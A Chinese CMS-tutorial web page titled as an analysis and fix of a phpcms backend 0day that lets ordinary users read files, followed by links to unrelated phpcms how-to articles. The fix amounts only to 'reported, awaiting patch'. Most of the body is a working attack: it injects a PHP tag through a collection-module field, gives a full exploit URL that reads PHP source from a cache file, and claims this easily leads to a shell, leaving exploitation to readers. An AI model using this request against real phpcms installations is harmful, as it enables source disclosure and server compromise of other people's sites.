phpcms后台普通用户读文件0day的分析以及修复方法

所属分类: CMS教程 / phpcms 阅读数: 2034
收藏 0 赞 0 分享
后台采集里设置采集模块中title 或者其他的内容都可以 设置为<?php[内容]?>
然后用下面的代码就可以读取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx
拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读数据库连接文件,并且还不能连),反正我是可以拿到shell。
修复:已提交给官方,等待补丁
更多精彩内容其他人还在看

修改phpcms v9后台登录地址的方法

这篇文章主要介绍了修改phpcms v9后台登录地址的方法,需要的朋友可以参考下
收藏 0 赞 0 分享

phpcms v9英语语言包应用详解

这篇文章主要介绍了phpcms v9英语语言包应用方法,需要的朋友可以参考下
收藏 0 赞 0 分享

phpcms v9安全检测api漏洞修改方法

为什么360总是提示Phpcms v9有api漏洞?今天在这里与大家探讨Phpcms V9安全检测api漏洞修改方法
收藏 0 赞 0 分享

phpcms自定义碎片插件之内容碎片标签模块使用方法

这篇文章主要介绍了phpcms自定义碎片插件之内容碎片标签模块使用方法,需要的朋友可以参考下
收藏 0 赞 0 分享

phpcms v9碎片管理及调用技巧分享

这篇文章主要介绍了phpcms v9碎片管理及调用技巧,需要的朋友可以参考下
收藏 0 赞 0 分享

phpcms v9更换模板的具体操作方法

这篇文章主要介绍了phpcms v9更换模板的具体操作方法,需要的朋友可以参考下
收藏 0 赞 0 分享

phpcms V9自定义评论字段UTF8_CMSYOU修正版

这篇文章主要介绍了phpcms V9自定义评论字段UTF8_CMSYOU修正版,需要的朋友可以参考下
收藏 0 赞 0 分享

phpcms v9使用GET调用指定id文章内容、页面数据方法(get标签什么方法)

这篇文章主要介绍了phpcms v9使用GET调用指定id文章内容、页面数据方法(get标签什么方法),需要的朋友可以参考下
收藏 0 赞 0 分享

phpcms v9栏目列表调用每一篇文章内容方法

怎么样在Phpcms V9栏目列表调用每一篇文章内容?在此,与大家分享这一方法。
收藏 0 赞 0 分享

phpcms v9后台登陆模板修改方法和程序版本更新提示修改方法

这篇文章主要介绍了phpcms v9后台登陆模板修改方法和程序版本更新提示修改方法,需要的朋友可以参考下
收藏 0 赞 0 分享
查看更多